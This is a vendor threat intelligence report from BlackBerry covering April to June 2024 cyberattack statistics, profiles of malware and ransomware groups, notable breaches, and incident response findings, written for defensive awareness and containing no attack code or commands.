Actionable Intelligence That Matters
This report provides a comprehensive review of the global threat landscape with a focus on providing actionable intelligence that customers can use to proactively secure their organizations. This report covers the time period from April through June 2024. Report highlights include:
Unique malware and attacks stopped (attempted attacks blocked by BlackBerry® cybersecurity solutions) are up 53% and 18% respectively from the prior reporting period. BlackBerry noted an average of over 11,500 unique malware hashes being caught daily.
Read Quarterly Attacks for more information.
This quarter, over 800,000 attacks occurred against critical infrastructure, with 50% of them being targeted against the financial sector.
Uncover our Cyber Threat Intelligence (CTI) team’s internal and external findings in the Critical Infrastructure section.
Commercial enterprises were heavily targeted this cycle, and of these attacks stopped, 66% were against companies that supply capital goods.
Read more about these threats in the section on Commercial Enterprise.
The new Law Enforcement Limelight section brings a fresh aspect to these reports, with findings from the Canadian National Cybercrime Coordination Centre (NC3).
Read more on the ransomware epidemic targeting Canada.
Many high-profile crime groups (namely ransomware groups) were highly active this reporting period. These groups use a range of complex tools to achieve their goals.
Read more under Threat Actors and Tooling.
The cyberthreat landscape is a maelstrom of groups exploiting the latest vulnerabilities and utilizing new or updated malware families.
Read our Prevalent Threats section to learn about trending threats across all major operating systems.
Malicious information stealers (aka infostealers) are a prominent weapon utilized by threat actors for exfiltrating valuable information and credentials.
Read our observations on exfiltration tooling in the CylanceMDR™ Observations section.
Our geopolitical analysis considers how the rise in sophisticated cyber threats underscores the need for enhanced cybersecurity education.
See how BlackBerry is investing in cyber education at its first Cybersecurity Center of Excellence (CCoE) in Malaysia.
Table of Contents
Total Cyberattacks This Period
From April to June 2024, BlackBerry cybersecurity solutions stopped 3.7 million cyberattacks. That’s over 43,500 cyberattacks stopped per day — an increase of 18% over our previous reporting period that ran from January to March 2024.
Additionally, we observed an average of 11,500 unique malware samples per day targeting our customer base, up 53% from the last report. This is one of the highest percentage increases, quarter-over-quarter, since we began our Global Threat Intelligence reports. While altering a binary hash or generating unique payloads isn't complex for seasoned threat actors, the unusually high volume of “Attacks Stopped” and “Unique Hashes” is significant. It indicates that malware developers are quickly updating and adapting their code to increase resilience. Raw figures suggest new malware is adapting, existing malware families are gaining capabilities, and adversaries are rapidly employing more advanced tactics. This results in more potent malware through enhanced obfuscation, sophistication and evasion techniques.
BlackBerry is actively monitoring and identifying modifications in malware families as cybercriminal developers make efforts to bypass cybersecurity systems. In this report, you will read the latest findings from our Threat Research and Intelligence Team, learn what groups are currently using each type of malware, and review our recommendations on strategic cyber defense against these types of threats.
As you will notice, the number of total attacks does not necessarily correlate with the number of unique hashes (new malware). As figures 2 through 9 in the next few sections illustrate, not every cyberattack uses unique malware. It depends on the attacker’s motivation, the complexity of the attack and their overarching goal — e.g., espionage, financial gain or causing general harm to the target.
Total Cyberattacks by Country
Attacks Stopped
Organizations utilizing BlackBerry solutions in the United States received the greatest number of attempted attacks this cycle. Outside of the U.S., South Korea, Japan, Australia and New Zealand also experienced a high level of attacks, earning them spots in our top five and making Asia-Pacific (APAC) the second most heavily targeted region.
In the APAC region, where BlackBerry's engagement is increasing, geopolitical tensions continue to influence cyber trends. State-sponsored and non-state sponsored cyberattacks on critical infrastructure, supply chains and businesses are on the rise. Organizations are increasingly targeted by a plethora of threats such as cyber espionage, eavesdropping, ransomware and phishing attacks. To enhance the resilience of their supply chains and organizations, they should exercise caution and heighten their vigilance to protect their infrastructure, data, devices and communications.
Figure 2 shows the top five nations in which BlackBerry cybersecurity solutions stopped the most cyberattacks, and which received the majority of malicious binaries.
Unique Malware
As noted in the Total Cyberattacks This Period section, BlackBerry observed an average of 11,500 novel hashes (unique malware) per day targeting our customer base, up 53% from the previous report. This is one of the highest percentage quarter-over-quarter increases we’ve observed since we began our recurring reports. Many factors contribute to this rise in unique malware. One is an increase in targeted attacks on a macro level — such as targeting an entire employee email list with targeted phishing emails and company specific lures — with the hope that multiple employees will be deceived.
As Figure 2 shows, the U.S., Japan, South Korea and Australia are still at the top of the list, as they were in the prior period’s report. Additionally, Canada is now the fifth largest recipient of unique malware.As Figure 2 shows, the U.S., Japan, South Korea and Australia are still at the top of the list, as they were in the prior period’s report. Additionally, Canada is now the fifth largest recipient of unique malware.
Results Comparison
Cyber Story Highlight: Espionage in APAC
Transparent Tribe Targets Indian Government, Defense and Aerospace Sectors Leveraging Cross-Platform Programming Languages
In their latest efforts, BlackBerry researchers identified Transparent Tribe, a Pakistani advanced persistent threat (APT) group, targeting India’s government, defense and aerospace sectors. Known for conducting cyber espionage since 2013, the group uses cross-platform languages like Python and Golang, and abuses web services such as Telegram and Discord. Recent campaigns included spearphishing emails aimed at key aerospace stakeholders in Bengaluru (formerly Bangalore), India. Despite attempts to hide their origins, Transparent Tribe’s tactics and tools pointed back to them.
Cyberattacks by Industry
BlackBerry has consolidated its industry sectors into two major categories: critical infrastructure and commercial enterprises. BlackBerry’s critical infrastructure telemetry and statistics come from its customers in the 16 sectors defined by the Cybersecurity and Infrastructure Security Agency (CISA) as critical infrastructure. These sectors include healthcare, government, energy, agriculture, finance and defense. Business entities within commercial enterprises engage in the production, distribution or sale of goods and services. These enterprises operate in various sectors such as manufacturing, retail and services.
Critical Infrastructure
Critical infrastructure is a lucrative target for cybercriminals. This data is often highly valuable and can be resold to other threat groups, used for planning attacks, or even for espionage. Threat actors targeting critical infrastructure may resort to using ransomware in their attacks because the organization may prefer to pay the ransom rather than take time trying to restore from backups. Time is of the essence for organizations providing critical services such as healthcare, and threat actors know this full well.
This year, geopolitical turbulence has placed critical infrastructure in the crosshairs of adversaries opposed to the policies of the nations they reside in or collaborate with. This frequently galvanizes threat groups and state sponsors to specifically target critical infrastructure.
The increasing digitization of critical infrastructure has made the sector even more vulnerable to cybercriminals in recent years. Threat actors actively exploit critical systems by attacking vulnerabilities such as system misconfigurations and unpatched legacy systems or attempting to infiltrate systems via social engineering campaigns conducted against employees.
In the time period from April to June 2024, CylanceENDPOINT™ and other BlackBerry cybersecurity solutions stopped over 800,000 attacks against organizations in the critical infrastructure industry sectors. Almost half of these attacks were against financial sector businesses — a 10% increase over last period — while government and public sector organizations experienced the greatest diversity of attacks, attracting over 45% of unique hashes.
In addition, nearly one half (49%) of unique malware hashes targeted critical infrastructure organizations, up 17% over the prior period, while 41% of the industry-specific cyberattacks encountered by BlackBerry cybersecurity solutions were against critical infrastructure.
-
Critical Infrastructure: Internal Threats
Internal threats are the threats that BlackBerry identifies and guards against within its own customer base. External threats (covered in the next section) are those reported by third parties, such as in industry news publications, security vendors or government agencies.
-
Vidar
Type: Infostealer
Targets: Telecommunications, healthcare
Regions: Latin America (LATAM), North America
Vidar is an infostealer that has been around since 2018. Likely the off-shoot of the once-notorious infostealer Arkei, Vidar has remained extremely active and is often sold via malware-as-a-service (MaaS) on underground forums. The malware is highly flexible and can be dropped onto a victim’s device through a variety of ways, such as via phishing documents, malvertising (advertising that spreads malware) and by secondary distribution via other malware. Earlier in 2024, we observed that Vidar was also used to target critical infrastructure. During this reporting period, we observed that Vidar primarily attacked telecommunications and healthcare sectors, especially in LATAM countries, and was also observed targeting healthcare in North America.
-
SmokeLoader
Type: Downloader
Targets: Food and agriculture, healthcare
Regions: LATAM, North America
Operational since 2011, SmokeLoader is a prominent delivery mechanism for second-stage malicious payloads including a variety of trojans, infostealers and even ransomware. SmokeLoader, which is sold as MaaS, can also harvest user credentials. It is popular with a number of high-profile threat groups due to its capacity to deploy additional malware. In May 2024, Europol coordinated Operation Endgame to target malicious downloaders. Over 100 malware servers were taken down or disrupted and over 2,000 domains were seized by law enforcement. Though these actions severely crippled the operations of the threat groups behind SmokeLoader, binaries related to the malware were still observed this quarter in the North American healthcare sector and the food and agriculture industry in LATAM.
-
RisePro
Type: Infostealer
Targets: Telecommunications, food and agriculture, healthcare
Regions: LATAM, North America
RisePro is a multifunctional infostealer often sold as MaaS on underground forums. RisePro was initially observed in late 2022. Then, in late 2023 and early 2024, BlackBerry noticed a sharp increase of RisePro activity.
The RisePro infostealer can be dropped onto a victim’s device in a variety of ways, frequently through malicious links or email attachments. It has also been deployed via PrivateLoader, a pay-per-install (PPI) malware often used as a malware distribution service.
Once on a victim’s device, RisePro communicates with its command-and-control (C2) server where it receives commands to steal data, drop additional malware and exfiltrate information from the device. This quarter, RisePro was observed targeting food, agriculture and telecommunications companies in LATAM countries and healthcare services in North America.
-
GuLoader
Type: Downloader
Targets: Education, transportation, healthcare, food and agriculture
Regions: APAC, North America
GuLoader (also known as CloudEyE) is a prominent downloader that distributes other malware. Since 2020, the threat group behind GuLoader has added anti-analysis techniques to make it more difficult for security services to identify its attacks or devise countermeasures. GuLoader commonly works in tandem with other malware, namely infostealers like FormBook, Agent Tesla and Remcos.
During this reporting cycle, GuLoader appeared to target mainly North American organizations in transportation, food and agriculture, and education. However, GuLoader binaries were also found in transportation companies in APAC countries.
-
Lumma Stealer
Type: Infostealer
Targets: Food and agriculture, energy, finance
Regions: APAC, LATAM, North America
Lumma Stealer (aka LummaC2) is a C-based infostealer that, for the second reporting period running, has targeted food and agriculture companies in LATAM and the energy sector in APAC. Lumma Stealer is MaaS that specializes in exfiltrating sensitive data like login credentials and banking details to commit bank fraud. Additionally, Lumma Stealer targeted financial services firms in both North America and APAC.
Cyber Story Highlight: Threats Against Critical Infrastructure
SideWinder Utilizes New Distribution Infrastructure to Target Ports and Maritime Facilities in the Mediterranean Sea
In July 2024, the BlackBerry Threat Research and Intelligence Team discovered a new campaign by the threat group known as SideWinder. Also known as Razor Tiger, Rattlesnake and T-APT-04, the SideWinder group has been active since at least 2012. The group has previously been observed targeting military, government and business entities, with a particular focus on Pakistan, Afghanistan, China and Nepal. SideWinder typically uses email spearphishing, document exploitation and DLL side-loading techniques to avoid detection and deliver targeted implants.
In this campaign, BlackBerry observed three falsified “visual bait” documents associated with very specific port infrastructure. Visual decoys are typically not in themselves malicious; their primary purpose is to distract the victim from realizing they are being compromised. The victim is usually an employee at a target company. Below is an example from SideWinder’s latest campaign:
Threat actors use a variety of tricks to tempt the victim to open and read the visual bait document:
- The attacker copies the real logo of a legitimate organization which the recipient is likely to be familiar with due to their job or industry. In Figure 7 above, the visual bait document abuses the logo of the (legitimate) Red Sea Ports Authority in Egypt.
- Document headings are designed to cause maximum anxiety in the recipient. The heading in our example above (“EMPLOYEE TERMINATION AND SALARY CUT NOTICE”) is intended to make the employee fear for the safety of their job and finances.
- In the sample above, note emotionally loaded phrases such as “depleted most of our financial reserves,” “serious concern” and “terminate employment” in the body copy of the document. These phrases are formatted in bold so they will immediately stand out to the reader.
Threat actors hope that by using familiar company logos and eliciting strong emotions such as fear or concern for job security, the victim will believe the document is legitimate and be compelled to read it in a state of high anxiety. They will then be so distracted that they won’t notice strange events on their device such as system popups or increased fan noise caused by high CPU utilization, which is often an early warning sign of a malware infection in progress.
By analyzing the data uncovered during our research, we concluded with medium confidence that SideWinder’s new campaign is targeting ports and maritime facilities in the Indian Ocean and Mediterranean Sea. Based on SideWinder’s prior campaigns, we believe that the goal of this new campaign is espionage and intelligence gathering. Read the full story in the BlackBerry Blog.
Critical Infrastructure: External Threats
BlackBerry also closely tracks external threats, or threats reported by outside organizations and not necessarily found in BlackBerry’s own tenants. Throughout this period, external groups — government agencies, industry news organizations and others — reported numerous attacks across the globe against critical infrastructure.
In the last few days of March, the news broke that various Indian government agencies and energy sector entities were infected with a customized variant of the freely available infostealer, HackBrowserData. Utilizing phishing emails as the infection vector and Slack channels as an exfiltration channel, the unknown threat actor stole 8.8 GB of sensitive data, including employee details and financial records.
In April, Frontier Communications, a telecommunications company based in Texas, reported to the U.S. Securities and Exchange Commission (SEC) that it had detected a breach on April 14 and had to shut down some of its systems to recover. The unknown threat actor was able to access sensitive data, including personally identifiable information.
Also in April, the Ukrainian Computer Emergency Response Team (CERT-UA) reported a plan by the allegedly Russian-sponsored group Sandworm to attack various critical infrastructure entities within the war-torn country. The plot targeted some 20 entities across various critical infrastructure sectors including water and energy. Sandworm’s long history of attacks on Ukraine’s critical infrastructure is likely to persist as the war between Russia and Ukraine continues.
The first week in May brought a joint advisory from multiple U.S. agencies in collaboration with the United Kingdom’s National Cyber Security Centre and Canada’s Centre for Cyber Security (CCCS) regarding an ongoing hacktivist threat from pro-Russian elements. The hacktivists targeted Internet-connected critical infrastructure, including water, energy, dams and agriculture. Their efforts focused on Internet-facing operational technology (OT) systems in critical infrastructure sectors across Europe and North America.
In early May, BlackBasta ransomware operators targeted a large non-profit Catholic healthcare provider with about 140 hospitals in 18 states across the U.S. The attack disrupted services across the healthcare provider’s network for several weeks. Then, in early June, BlackBasta stole 550 GB of data from the Maryland-based biotechnology firm Elutia. The data included employee and financial information.
BlackBasta wasn’t the only ransomware gang targeting healthcare. In late June, the BlackSuit ransomware group breached South Africa’s National Health Laboratory Service (NHLS) and its 265 labs. BlackSuit is thought to be a derivative of the aggressive and dangerous Conti ransomware gang. The BlackSuit breach coincided with a monkeypox (mpox) outbreak and significantly impacted the NHLS systems. The threat actor deleted portions of the NHLS systems, including backups, though no sensitive patient data was reported lost.
These attacks and others throughout the last quarter indicate that ransomware operators targeting critical infrastructure, particularly the healthcare sector, remain a persistent issue.
Commercial Enterprise
Internal threats against commercial enterprises also increased significantly during this reporting period. The number of attacks stopped by BlackBerry cybersecurity (1.1 million attacks) rose by 60% compared to the last report.
Within the commercial enterprise sector, we observed a significant increase in attacks against the capital goods sector. Unlike consumer goods, capital goods include machinery, tools and equipment essential for various industries throughout commercial enterprise and critical infrastructure. Targeting these assets can impact a business’s digital and physical supply chains.
-
Commercial Enterprise: Internal Threats
Internal threats are the threats that BlackBerry identifies and guards against within its own customer base. External threats (covered in the next section) are those reported by third parties, such as in industry news publications, security vendors or government agencies.
-
Amadey
Type: Bot/Infostealer
Targets: Manufacturing, commercial services, capital goods
Regions: Europe, the Middle East and Africa (EMEA), APAC, LATAM
First appearing in 2018, Amadey is a modular malware still active across the threat landscape. Through iterative changes, it has remained relevant with recent advances in its communications. Amadey can gather intelligence and poll victim machines before exfiltrating data to its C2. It is often used as a bot network to spread other malware en masse and frequently facilitates the deployment of infostealers and malicious cryptominers.
During this reporting period, Amadey targeted manufacturing and commercial services in the EMEA, APAC and LATAM regions, as well as capital goods services specifically within LATAM nations.
-
PrivateLoader
Type: Downloader
Targets: Manufacturing, commercial services
Regions: APAC, LATAM, North America
PrivateLoader is a widespread facilitator of malware operating as a pay-per-install service for distributing malware. Often distributed via fake websites hosting “cracked” software, PrivateLoader can download a variety of malicious payloads, including a wide range of infostealers like RisePro. PrivateLoader uses a technique known as SEO poisoning to increase the prominence of their fake websites. The technique tricks users by making them assume the top search results are the most credible and is very effective when people fail to look closely at their search results. During this reporting period, PrivateLoader targeted manufacturing in North America and commercial services in LATAM and APAC.
-
Agent Tesla
Type: Remote Access Trojan
Targets: Manufacturing, food retailing, commercial services
Regions: APAC, LATAM, North America
Agent Tesla is a prominent remote access trojan (RAT) specializing in information theft which has been actively targeting users with Microsoft Windows OS-based systems since 2014. Sold via underground forums and promoted as a MaaS offering, this commercial malware is known for stealing sensitive data and credentials, recording keystrokes and capturing screenshots of victims’ screens. It is often leveraged in phishing campaigns and hosted/distributed as trojanized cracked software.
A number of sectors were targeted by Agent Tesla this cycle, including manufacturing, food retail and commercial services in countries in APAC, LATAM and North America.
-
FormBook
Type: Infostealer
Targets: Food retailing
Regions: APAC
FormBook and its evolution, XLoader, are sophisticated malware families operating both as complex infostealers and versatile downloaders for additional malware. Since their inception, these malware families have been resilient and constantly evolving to evade and circumvent cyber defenses through anti-VM techniques, process injection and custom encryption routines.
Often sold as MaaS, XLoader can steal data from browsers, email clients and a range of other applications. A number of cyber-incidents related to XLoader targeted food retailers in APAC countries this quarter.
-
GuLoader
Type: Downloader
Targets: Commercial services, food retailing, manufacturing
Regions: APAC, EMEA, North America
GuLoader, also known as CloudEyE, is a prominent downloader used in numerous attacks as a delivery mechanism for other malware. Active since 2020, it has undergone iterative changes, becoming more sophisticated and integrating additional anti-analysis techniques. GuLoader commonly works with other malware, namely infostealers like FormBook, Agent Tesla and Remcos.
This quarter, GuLoader targeted manufacturing in North America, food retailers in APAC and commercial services in both EMEA and APAC.
-
RisePro
Type: Infostealer
Targets: Commercial services, capital goods
Regions: APAC
RisePro is a multifunctional infostealer often sold as MaaS on underground forums. RisePro was initially observed in late 2022. Then, in late 2023 and early 2024, BlackBerry noticed a sharp increase of RisePro activity. RisePro can be dropped onto a victim’s device in a variety of ways, often through malicious links or email attachments. It also has been deployed via PrivateLoader, a PPI malware frequently used as a malware distribution service. Once on a device, RisePro communicates with its C2 server where it receives commands to steal data, drop additional malware or exfiltrate information from the victim’s device.
-
Vidar
Type: Infostealer
Targets: Manufacturing, food retailing, commercial services, capital goods
Regions: APAC, EMEA, LATAM
Vidar is an infostealer that has been around since 2018 and may be the offshoot of the infostealer known as Arkei. Vidar has been extremely active and is often sold as MaaS through underground forums. The malware is highly flexible and can be dropped onto a victim device in a variety of ways, such as via phishing documents, malvertising (advertising that spreads malware) and by secondary distribution via other malware. During this reporting period, Vidar targeted a host of commercial enterprise industries, including manufacturing in EMEA, food retailing in APAC, capital goods in LATAM and commercial services in both LATAM and APAC.
Commercial Enterprise: External Threats
In early April, IxMetro PowerHost suffered a cyberattack by the relatively new SEXi ransomware gang, allegedly using leaked LockBit 3.0 source code. The group targeted the organization’s VMware ESXi servers and backups, causing significant disruption to IxMetro PowerHost’s services in Chile.
Also in April, the Chinese shopping platform Pandabuy was breached and the data of more than 1.3 million customers was leaked online. Pandabuy enables users to purchase products from other Chinese e-commerce platforms. A threat actor known as Sanggiero claimed responsibility for the attack, stating they exploited critical server vulnerabilities within the platform’s API and other exploits to gain access to the retailer’s internal services. The e-commerce retailer was suspected to have initially paid a demand to prevent data leakage. However, in June 2024, the same threat actor claimed to have exploited and extorted the Chinese-based platform again.
In early May, a major multinational technology company alerted customers to a large-scale data breach affecting nearly 50 million individuals. While the technology company confirmed that no financial information was compromised, other personally identifiable information (PII) was exposed, including customer names and physical addresses. Despite this, the technology company has publicly downplayed the potential impact of the breach due to the non-financial nature of the stolen data.
One of the largest data breaches this year so far occurred in May when the threat group ShinyHunters breached a multinational entertainment ticket sales and distribution company and stole the data from over 560 million customers. The data included PII like names, addresses and emails, as well as hashed credit card details. Affected users have since been notified by mail.
In June, an American multinational software company suffered a large outage due to a ransomware attack, impacting operations at thousands of North American car dealerships. The disruption affected all facets of the dealers’ activities, including car sales and repairs, across more than 15,000 locations. The ransomware group BlackSuit claimed responsibility for the attack, demanding nearly U.S. $25 million in cryptocurrency as ransom. It is alleged that the organization paid the ransom to restore its systems.
In late June, TeamViewer, the North American-based software services company, confirmed that prolific APT group Cozy Bear (aka APT29) attacked their corporate IT systems. Cozy Bear is a Russian-based hacking group allegedly affiliated with Russia’s Foreign Intelligence Service. The group committed multiple attacks and exploits over the years, including the 2020 SolarWinds breach. TeamViewer released a statement claiming that only employee account data was compromised, and that they found no evidence that Cozy Bear accessed production environments or customer data.
Cyber Story Highlight: Deepfakes Against Commercial Enterprises
Employee Vigilance: The First Line of Defense Against Deepfake Scams
Deepfake photos, videos and “deep-voice” audio are becoming an increasing problem in cybersecurity. Deepfakes are digitally manipulated media created using generative artificial intelligence (AI), with the most common use-case being a “faceswap” — digitally superimposing one person’s face onto another. Deepfake media is often highly realistic and convincing and can be weaponized by bad actors for use in a wide range of attacks, including phishing scams, fake phone calls, and even fake video calls intended to make the recipient think they are receiving a legitimate request from another employee, such as their boss.
Since the first app for creating deepfakes was launched by a Reddit user in late 2017, deepfakes have evolved at a lightning-fast rate to become frighteningly effective in tricking employees into providing attackers with login credentials, financial or customer records, and even wiring millions of dollars of company funds to a scammer.
In a recent incident, car manufacturer Ferrari escaped a costly deepfake scam. An executive received a suspicious call from someone pretending to be the CEO, Benedetto Vigna. The scammer’s accent and tone were almost identical to that of the real CEO’s, but the executive noticed red flags such as the use of an unfamiliar phone number and the purported urgency of the messages.
To verify the caller’s identity, the executive asked a specific question about a book recommendation — a detail only the real CEO would know. When the scammer couldn’t answer, they hung up. The executive’s quick thinking averted a potential disaster and prompted Ferrari to launch an internal investigation to ensure the security of their communications.
This incident highlights the important role employees play in safeguarding their companies from fraud. A critical component of almost all deepfake attacks is social engineering; the threat actor assumes the employee is the weakest link in a company’s security perimeter and uses psychological manipulation techniques to gain their target’s trust. Kudos to employees who remain vigilant and skeptical of unusual requests, especially those involving the transfer of money or sensitive information. Their awareness and quick action can save a company from significant financial loss and reputational damage.
Companies can improve their security by educating employees on the red flags that indicate a scammer may be behind a “fake” phone/video call, email or text. You can start by celebrating and supporting these unsung heroes who protect your organization from sophisticated threats every day. Share this anecdote with colleagues and coworkers. Remind them that if they suspect something isn’t right, to trust their instincts and find a secondary way to verify the identity of the requester.
To learn more about deepfakes, read our white paper, Deepfakes Unmasked: The Technology and Techniques Behind This Growing Threat.
Geopolitical Analysis and Comments
Governments around the world are increasingly clear-eyed about the fact that technology is a driving force in geopolitical rivalry. In his address at the RSA Conference in San Francisco, California on May 6, 2024, U.S. Secretary of State, Antony J. Blinken described a world on the doorstep of a zero-sum competition in which countries would be forced to adopt Western or Chinese technology stacks. Secretary Blinken’s ambassador for cyberspace and digital policy, Nathaniel C. Fick, was even more pointed when he stated that, “The international order will be defined by whose metaphorical operating system dominates.”
The unprecedented pace at which technologies such as generative AI are moving has led to a wellspring of activity calling for the “responsible” use of advanced digital technologies. While technologies like AI have significant potential to drive economic growth, transform societies and tackle some of the world’s most intractable problems (e.g., climate change, inequality, and disease), they also pose risks that can be high-impact, particularly if those risks manifest in critical infrastructure or services that people depend on every day.
As underscored in this report, cybercriminals — including state-sponsored groups — have increasingly targeted critical infrastructure. Incidents of malicious or criminal intent to disrupt services or hold critical infrastructure operators and owners ransom have skyrocketed globally over the past several years. This reporting period, BlackBerry documented more than 800,000 attacks against critical infrastructure, with 50% targeted against the financial sector. Perpetrators are aware of the criticality of these services and seek to maximize their efforts to extract ransom by seeking to cause, or threatening to cause, maximum disruption to those services.
Major international sporting events, such as the Olympics and FIFA World Cup, have also become the focus of cyberthreats. In anticipation of a dramatic upswing in malicious cyber activity, Canada’s Centre for Cyber Security released a cyberthreat bulletin in May 2024, assessing that “cybercriminals will very likely target large organizations associated with major international sporting events and local businesses around major sporting events through business email compromise and ransomware attacks.” It also warned attendees and spectators to be on the lookout for phishing emails and malicious websites using these events as lures for attacks.
Indeed, after the Olympic games were over, French authorities reported more than 140 cyberattacks linked to the 2024 Olympics, with all being characterized as “low impact.” However, given trends during previous Olympics, this number is likely a vast underestimation. For example, during the Tokyo Olympics held in 2021, organizers reported 450 million cyberattacks.
As the World Economic Forum (WEF) noted in its Global Cybersecurity Outlook 2024, governments and businesses struggle to maintain cyber resilience against rapidly escalating and increasingly sophisticated cyberthreats that could cause massive disruption. Moreover, there is a great divergence in the ability of organizations to protect themselves. Per the WEF, while 85% of organizations with 100,000 or more employees have cyber insurance, less than 21% of organizations with fewer than 250 employees carry cyber insurance. All in all, the smallest organizations are more than “twice as likely as the largest to say they lack the cyber resilience they need to meet their minimum critical operational requirements.” This imbalance between large and small organizations needs to be addressed.
While affordability of cyber technologies has been highlighted as a critical factor, so have education and cyber awareness. This is why in addition to providing accessible security solutions, BlackBerry is investing in cyber education. In March 2024, BlackBerry inaugurated its first Cybersecurity Center of Excellence (CCoE) in Malaysia. The CCoE will deliver exceptional cybersecurity training and threat intelligence to help Malaysia and partner governments and organizations in the Indo-Pacific region to better prevent, deter and respond to the cyberthreats facing them.
More needs to be done to raise the bar on cybersecurity and compensate for the global shortage of close to four million trained cyber professionals. As more organizations and industries rely on digital and cloud-based technologies, their need for a robust, multi-faceted approach to cybersecurity becomes crucial.
Law Enforcement Limelight
Enhancing Law Enforcement Capabilities: NC3’s Specialized Support
The National Cybercrime Coordination Centre (NC3) was founded in 2020 in response to Canada’s 2018 National Cyber Security Strategy. Under the stewardship of the Royal Canadian Mounted Police, this national police service is mandated to help reduce the threat, impact and victimization caused by cybercrime in Canada. It provides specialized support to all Canadian police services and employs both police and civilian staff with diverse skill sets to provide the investigative and technical expertise required to effectively analyze sophisticated crimes. The NC3 provides specialized services to support law enforcement partners, such as:
- Cybercrime intelligence
- Technical advice and guidance
- Tool development
- Behavioral analysis
- Cryptocurrency tracing
The NC3 works closely with domestic and international law enforcement, government partners, private industry and academia to continuously improve the Canadian law enforcement response to cybercrime.
The Prevalence of Ransomware
Top Ransomware Threats in Canada
The NC3 conducts regular assessments to identify the top ransomware threats in Canada. The most recent assessment covered incidents from January 1, 2024 through April 30, 2024. The figure below provides the top ten ransomware threats for this period.
Despite the prevalence of ransomware, most cybercrime is unreported. It is estimated that only about 10% of cybercrime is reported to Canadian law enforcement. This underreporting makes it challenging to fully understand the prevalence and impact of cybercrime in this country.
An Underreported Crime
Cyber Story Highlight: Ransomware Hits the Skies
Akira Ransomware Targets the LATAM Airline Industry
In June 2024, BlackBerry researchers investigated an attack by Storm-1567 using Akira ransomware against a Latin American airline. This financially driven gang, known for double extortion tactics, initially accessed the network via SSH and exfiltrated crucial data before deploying Akira. Notable for exploiting outdated systems and abusing legitimate software, Storm-1567 targets SMBs globally, targeting over 250 organizations and amassing over $42 million in ransom as of January 2024.
Incident Response Analysis and Comments
The BlackBerry Incident Response (IR) Team regularly monitors incidents in which the initial infection vector is an Internet-connected device. Cyberattacks on vulnerable devices — such as misconfigured devices or those with factory set passwords — are common. Overworked corporate security teams often fail to adequately secure all of their Internet devices (network printers and laptop web cameras, for example). In addition, increasingly critical functions are now being baked into devices, such as network and firewall appliances.
This quarter, the IR team found vulnerabilities in outdated versions of Cisco Adaptive Security Appliances (ASA) and devices with Palo Alto Networks PAN-OS software. Unprotected or poorly configured Internet devices can allow cyber thieves to deploy ransomware into the company’s environment and exfiltrate its data. This highlights the need for companies to apply security updates to all Internet-exposed systems and to do so in a timely manner. (MITRE – External Remote Services)
The team observed several incidents where the unauthorized actor was able to access company cloud resources. The two recent situations detailed below underscore the importance of regular system updates and robust network security measures.
- Incident 1: During a cybersecurity breach, threat actors exploited a series of vulnerabilities on an outdated Cisco ASA to gain unauthorized access to the company’s virtual private network (VPN). Once inside the network, they utilized the Microsoft Remote Desktop Protocol (RDP) to infiltrate the domain controller, allowing them to obtain a comprehensive list of users and groups within the domain. Leveraging tools such as netscan and Advanced IP Scanner software, the threat actors conducted a thorough network scan to map out the infrastructure. Subsequently, the attackers exfiltrated the entire "C:\Users" folder that contained critical user data and then deployed Akira ransomware, causing significant disruption and data loss.
- Incident 2: A client received alarming security alerts from their domain controllers, signaling unauthorized access. Investigation revealed that the threat actors had exploited vulnerabilities in an outdated, end-of-life Cisco ASA appliance to infiltrate the network. Once inside, the attacker deployed BlackSuit ransomware, causing significant disruption to the client's operations.
These incidents highlight the need for companies to implement strong authentication security controls on all systems. (MITRE – Valid Accounts: Cloud Accounts)
Cyber Story Highlight: Massive Data Breach Exposes 2.9 Billion Records
Four Terabytes of Highly Personal Data Stolen from Citizens of the U.S., the UK and Canada.
In April, a sales thread was posted on the notorious underground cybercrime site BreachForums related to a suspected leak of the personal records of “the entire population of the USA, CA and UK.” The post claimed that four terabytes of data had been stolen, consisting of highly sensitive PII like full names, mailing addresses, phone numbers and even Social Security numbers (SSNs) of American citizens, as well as people in the United Kingdom and Canada.
The threat actor known as USDoD claimed to have stolen over 2.9 billion rows of records and demanded a substantial fee of U.S. $3.5 million for the leaked information in this large dataset.
This ransom demand ultimately proved unsuccessful, and in July, 4 terabytes of data were released for free via BreachForums. It consisted of over 137 million email addresses, 272 million SSNs, and more. The cause of the leak is believed to be related to RecordsCheck.net, a subsidiary site of the data broker and background check service National Public Data (NPD), which inadvertently published the passwords to its back-end database in a plaintext file that was freely available from its homepage — a critical security oversight that was eventually discovered and exploited by the threat actor.
In a formal statement, NPD acknowledged an attempt in late 2023 to access their records; however, they didn’t mention the extent of the records that might have been affected.
Though only recently leaked, the data itself spans decades, meaning that a percentage of victims affected by this leak may be potentially already deceased, and some data in the leak is likely out of date. It’s also important to note that one person can have many different records, each related to previous addresses and names associated with that person. This means that the number of people impacted by this leak will likely be far less than the previous erroneous media claim that 3 billion people may have been affected.
However, given the sheer volume of PII data, it has become one of the largest recorded data leaks ever in the United States, and should be cause for concern of all U.S.-based victims. It is highly likely that this stolen data will be leveraged and weaponized by many other threat actors in the following months as the fallout of this debacle settles. It is therefore important that all citizens actively monitor their credit reports for fraudulent activity and report it to the credit bureaus if detected.
-
Threat Actors and Tooling
Beyond the threat actors noted in our internal investigations and findings, several other groups have launched various cyberattacks this quarter. These groups often employ an array of tools and malware to execute their illicit activities. Here, we highlight some of the most impactful attackers and notable tools identified by our Threat Research and Intelligence Team this quarter.
-
BlackSuit
BlackSuit is a private ransomware operation that surfaced in April 2023. This group employs a multifaceted extortion strategy, involving both the exfiltration and encryption of victim data. They also maintain dark web data leak sites where stolen confidential data from noncompliant victims is publicly posted. BlackSuit targets organizations of all sizes across various industries, including healthcare, education, information technology (IT), government, retail and manufacturing.
BlackSuit’s attack methods include phishing emails, malicious torrent files and exploiting vulnerabilities in VPNs and firewalls. The group leverages a mix of legitimate and malicious tools such as Cobalt Strike, WinRAR, PuTTY, Rclone, Advanced IP Scanner, Mimikatz, PsExec, Rubeus and GMER for lateral movement and credential dumping. Their ransomware payloads are designed to target both Windows® and Linux® operating systems and, in some cases, VMware ESXi servers.
The U.S. Department of Health and Human Services has highlighted similarities between BlackSuit and Royal ransomware, suggesting that BlackSuit may originate from Royal’s creator, the notorious Conti group. The encryption mechanisms and command line parameters used by BlackSuit bear a striking resemblance to those found in Royal, indicating a shared codebase.
Targets this period include:
- Kadokawa Corporation, a Japanese media conglomerate, where the group masqueraded as a legitimate component of the Qihoo 360 antivirus software.
